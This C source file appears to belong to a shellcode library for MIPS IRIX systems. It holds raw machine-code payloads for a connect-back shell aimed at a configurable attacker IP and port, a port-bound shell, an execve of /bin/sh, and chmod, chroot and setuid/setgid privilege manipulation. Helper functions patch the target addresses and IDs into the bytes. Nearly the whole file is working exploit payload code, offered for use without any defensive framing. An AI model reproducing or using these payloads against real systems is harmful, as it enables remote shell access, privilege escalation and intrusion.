#include #include #include #include "shellcode.h" #include "mips.h" /* tested on: IP20 R4000 6.5 */ shellcode mips_irix_chmod = { "mips-irix-chmod", 64, "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55" /* ^^ ^^ = uid ^ 0x5555 */ "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80" /* ^^ ^^ = gid ^ 0x5555 */ "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8" /* ^^ ^^ = length of appended pathname + 0xfeb8 */ "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7" "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c" "\x24\x18\x72\xec", }; /* tested on: IP20 R4000 6.5 */ shellcode mips_irix_chroot = { "mips-irix-chroot", 84, "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e" "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0" "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c" "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11" "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c" "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26" "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50", }; /* tested on: IP20 R4000 6.5 */ shellcode mips_irix_connectsh = { "mips-irix-connectsh", 172, "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42" /* ^^ ^^ port */ /* ^^ ^^ ip 1.2. */ "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8" /* ^^ ^^ ip .3.4 */ "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23" "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2" "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee" "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff" "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c" "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc" "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20" "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8" "\x24\x02\x04\x23\x01\x01\x01\x0c" "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ }; /* tested on: IP20 R4000 6.5 */ shellcode mips_irix_execvesh = { "mips-irix-execvesh", 48, "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc" "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23" "\x01\x01\x01\x0c" "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ }; shellcode mips_irix_exit = { "mips-irix-exit", 16, "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c" "\x24\x18\x73\x50", }; /* tested on: IP20 R4000 6.5 * IP30 R10000 6.5.7m (thanks oxigen ;) */ shellcode mips_irix_portshellsh = { "mips-irix-portshellsh", 188, /* yay! well optimized */ "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */ "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0" "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c" "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec" "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c" "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03" "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff" "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26" "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6" "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8" "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c" "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ }; /* tested on: IP20 R4000 6.5 */ shellcode mips_irix_read = { "mips-irix-read", 56, "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31" "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb" "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10" "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f" "\x01\x01\x01\x0c\x24\x18\x73\x50", }; shellcode mips_irix_setgid = { "mips-irix-setgid", 16, "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */ "\x01\x01\x01\x0c", }; shellcode mips_irix_setreuid = { "mips-irix-setreuid", 24, "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55" /* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */ "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c", }; shellcode * mips_irix_shellcodes[] = { &mips_irix_chmod, &mips_irix_chroot, &mips_irix_connectsh, &mips_irix_execvesh, &mips_irix_exit, &mips_irix_portshellsh, &mips_irix_read, &mips_irix_setgid, &mips_irix_setreuid, NULL, }; arch mips_irix = { "mips-irix", 4, mips_nop, mips_irix_shellcodes, }; /* set the uid, gid and pathname of the mips-irix-chmod code at `code' * XXX: be sure to have strlen(pathname) bytes left after code */ void mips_irix_chmod_setup (unsigned char *code, char *pathname, unsigned short int uid, unsigned short int gid) { unsigned short int len = 0xfeb8; uid ^= 0x5555; code[6] = (uid >> 8) & 0xff; code[7] = uid & 0xff; gid ^= 0x5555; code[14] = (gid >> 8) & 0xff; code[15] = gid & 0xff; len += strlen (pathname); code[26] = (len >> 8) & 0xff; code[27] = len & 0xff; memcpy (code + 64, pathname, strlen (pathname)); return; } /* ip and port in network byte order */ void mips_irix_connectsh_setup (unsigned char *code, unsigned long int ip, unsigned short int port) { code[38] = (port >> 8) & 0xff; code[39] = port & 0xff; code[46] = (ip >> 24) & 0xff; code[47] = (ip >> 16) & 0xff; code[50] = (ip >> 8) & 0xff; code[51] = ip & 0xff; return; } /* set the gid within the 'mips-irix-setgid' code at `code' */ void mips_irix_setgid_setup (unsigned char *code, unsigned short int gid) { gid ^= 0x5555; code[2] = (gid >> 8) & 0xff; code[3] = gid & 0xff; return; } void mips_irix_setreuid_setup (unsigned char *code, unsigned short int ruid, unsigned short int euid) { ruid ^= 0x5555; code[2] = (ruid >> 8) & 0xff; code[3] = ruid & 0xff; euid ^= 0x5555; code[6] = (euid >> 8) & 0xff; code[7] = euid & 0xff; return; }